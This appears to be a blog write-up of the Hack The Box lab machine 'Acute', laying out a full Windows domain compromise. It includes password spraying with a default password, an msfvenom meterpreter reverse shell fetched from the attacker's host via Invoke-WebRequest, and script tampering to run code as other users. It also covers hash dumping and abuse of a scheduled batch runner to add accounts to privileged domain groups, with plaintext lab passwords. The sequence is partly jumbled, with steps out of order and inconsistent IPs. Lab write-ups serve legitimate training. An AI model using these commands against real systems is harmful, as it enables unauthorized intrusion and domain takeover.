htb-acute-nl

Acute

We always
start with an nmap scan…..

nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Wed Feb 16 14:29:52 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.27s latency).
Not shown: 65534 filtered ports
PORT    STATE SERVICE
443/tcp open  https

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Feb 16 14:31:33 2022 -- 1 IP address (1 host up) scanned in 101.32 seconds

Now that is strange just one port which is 443 HTTPS .

nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
# Nmap 7.91 scan initiated Wed Feb 16 14:29:26 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.29s latency).

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_ssl-date: 2022-02-16T16:29:37+00:00; +2h59m36s from scanner time.
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2h59m35s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 16 14:30:03 2022 -- 1 IP address (1 host up) scanned in 36.87 seconds

Now that is interesting let add atsserver.acute.local 10.10.14.145 to /etc/hosts now let see what we have running on the webpage.

image

Now what do we have let try looking around to see what we can get maybe hint or anything that can be useful to further our enumeration forawrd.

image

Now we can use that to create some userlist maybe it can useful.

Awallace
Chall
Edavies
Imonks
Jmorgan
Lhopkins

image

Now that New Starter Forms look interesting let click on it.

image

So we downloaded a doc file let check it and see what we have in it.

image

Seems like a checklist interesting right now that is promising.

image

Arrange for the new starter to meet with other staff in the department as appropriate. This could include the Head of Department and/or other members of the appointee’s team. Complete the remote training.

image

Now that is cool i click on the remote which i got transfer to a staff webpage which is a Windows PowerShell Web Access ahhh nice.

https://atsserver.acute.local/Acute_Staff_Access/

image

Since we already know the default password for new staff which is Password1! let try to get the computer name back to the doc let check if we have anything hidden on it with exiftool.

image

Now we have the Computer name let the password with all the userlist we compile.

image

I was able to get in with edavies login in to Acute-PC1 now time to enumerate the system more to see what we can loot. So the best thing o do now is to get a proper reverse shell back to our terminal.

└─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.13 LPORT=1337 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of exe file: 206848 bytes

Then, we open up Msfconsole and configure our listener.
use exploit/multi/handler
set lhost tun0
set lport 1337
set payload windows/meterpreter/reverse_tcp
run

Now we use msfvenom to generate a payload file to get a reverse shell now let find writable folder on the target.

image

Found a writable folder let transfer our payload.

image

Invoke-WebRequest "http://10.10.14.52:8000/shell.exe" -OutFile "shell.exe"

Now let start our listener before executing our payload.

image

Now let click on run and execute the payload on the target.

image

 

Now that we a meterpreter shell let use the screenshare command to see what has taken place on the target

image

We can confirm the streaming on browser.

image

image

image

Now we just need to create the same object and use Invoke-Command to execute commands has user imonks

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

Then, we execute the wm.ps1 script and re-check the local administrators group to see if we have achieved our goal.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1} -Credential $cred 
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1} -Credential $cred
The command completed successfully.

PS C:\utils>

.

PS C:\utils> net localgroup Administrators
net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\edavies
ACUTE\jmorgan
Administrator
The command completed successfully.

PS C:\utils>

Indeed, edavies is now a local administrator on Acute-PC01 .
Note: For the administrator permissions to take effect logging off and logging back in as edavies on the PSWA session is required.

.

image

Now boom we can execute command has imonks now let enumerate more.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users} -credential $cred

We have more users to enumerate let hit it.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users/imonks/desktop} -credential $cred

We end up with the following chain of commands:

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock {((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','net localgroup administrators edavies /add') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-Content c:\users\imonks\Desktop\wm.ps1} -credential $cred

Boom we have user.txt also seems we have a powershell script let cat it to see what we have inside.

image

Now that scripts look promising seems it a script that contain jmorgan password we can see it in the object it possible to execute command has jmorgan if we run the script. So what we need to do is edit Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds remove Get-Volume and add a path to our reverse shell executable file.

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock{((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\rev.exe') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred

image

Now we can execute it with invoke-command again.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1} -credential $cred

image

Now back to check our listener.

image

Boom we shell has jmorgan cool now let check which localgroup jmorgan is on.

image

Now we know jmorgan is part of administrator group we can dump the hashes.

image

Now let crack the administrator hash .

image

But the issue is when i try to use on the administrator it a dead end so let try password reuse on each users we know we have no access to yet use powershell script just like the first time setting object and using the invoke-command .

A flashback if i can remember we found some new users ATSSERVER why not let give it a try with the usernames.

image

$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

Boom work for user awallace more enumeration now.

image

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /"program files"} -credential $cred

Now that folder look strange and interesting keepmeon let check what we have in it.

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /"program files"/keepmeon} -credential $cred

image

Now we have a bat file let cat to see what the keepmeon.bat doing.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /"program files"/keepmeon/keepmeon.bat} -credential $cred

Now that seems like a job keep running every 5min just like a cronjob in linux probably these one is scheduled to run every 5 min which is cool i guess.

REM This is run every 5 minutes. For Lois use ONLY

@echo off

 for /R %%x in (*.bat) do (

 if not "%%x" == "%~0" call "%%x"

)

Let me break it down any file ending with .bat would run every 5 min since we are in the keepmeon folder so it possible to create a payload in a bat format which can give access to lois now back to the doc file we got first.

image

**Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin. **

Now let add user awallace to the group of site_admin and wait for 5min to confirm it.

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}

image

Now we can confirm if user awallace is now part of site_admin group.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {net group site_admin} -credential $cred

Now we are part of site_admin group time to get the root.txt flag.

image

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users/administrator/desktop} -credential $cred

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /users/administrator/desktop/root.txt} -credential $cred

.

PS C:\utils> $passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)
$cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)
PS C:\utils> invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred
invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred
acute\awallace
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-ChildItem 'C:\Program Files\Keepmeon\'} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-ChildItem 'C:\Program Files\Keepmeon\'} -Credential $cred


Directory: C:\Program Files\Keepmeon


Mode LastWriteTime Length Name PSComputerName 
---- ------------- ------ ---- -------------- 
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER


PS C:\utils>

.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-Content 'C:\Program Files\Keepmeon\keepmeon.bat'} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-Content 'C:\Program Files\Keepmeon\keepmeon.bat'} -Credential $cred
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
PS C:\utils>

.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.

PS C:\utils>

It seems like the site_admin group has access to the Domain Admins group which is our final goal.
So, let’s try to create a script that when Lois executes it, through the keepmeon.bat script, imonks will be
added to the site_admin group.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred
PS C:\utils>
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-childitem 'c:\program files\Keepmeon\'} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-childitem 'c:\program files\Keepmeon\'} -Credential $cred


Directory: C:\program files\Keepmeon


Mode LastWriteTime Length Name PSComputerName 
---- ------------- ------ ---- -------------- 
-a---- 09/09/2022 13:43 42 imonks.bat ATSSERVER 
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER


PS C:\utils>

 

After 5 minutes or so, we check, once more, the members of the site_admin group to make sure that
imonks was successfully added.

Now, according to our enumeration imonks is able to add himself to the Domain Admins group.

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)

.

PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" imonks /add /domain} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" imonks /add /domain} -Credential $cred
System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ PSComputerName : ATSSERVER

NotSpecified: (:String) [], RemoteException
Access is denied.
NotSpecified: (:String) [], RemoteException
PS C:\utils>

.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" /domain} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" /domain} -Credential $cred
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator 
The command completed successfully.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-content C:\Users\Administrator\Desktop\root.txt} -Credential $cred
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-content C:\Users\Administrator\Desktop\root.txt} -Credential $cred
91ac558b60398bde3b9fe9d00f7767da
PS C:\utils>

.

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *